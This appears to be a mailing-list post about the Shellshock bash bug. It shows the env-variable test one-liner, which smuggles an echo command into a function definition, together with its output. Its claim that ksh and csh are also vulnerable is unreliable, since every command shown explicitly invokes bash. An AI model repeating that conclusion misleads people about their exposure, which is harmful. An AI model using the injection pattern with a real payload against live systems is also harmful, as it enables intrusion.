Hello list,
the bug in bash shell discovered last day also seems to be present in ksh and
csh. ksh is known to be the default shell in OpenBSD.
the following piece of shell code executes succesffuly on both ksh and csh
(besides bash of course):
ksh:
$ env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
Bash is vulnerable!
Bash Test
csh:
% env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
Bash is vulnerable!
Bash Test
bash:
$ env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
Bash is vulnerable!
Bash Test
all platforms seem to be affected 5.2, 5.3, 5.4, 5.5 - amd64
I wonder what it is to be done to circumvent any potential security risc for
people who call shell script code from cgi scripts for example.
Cheers,
/Bogdan
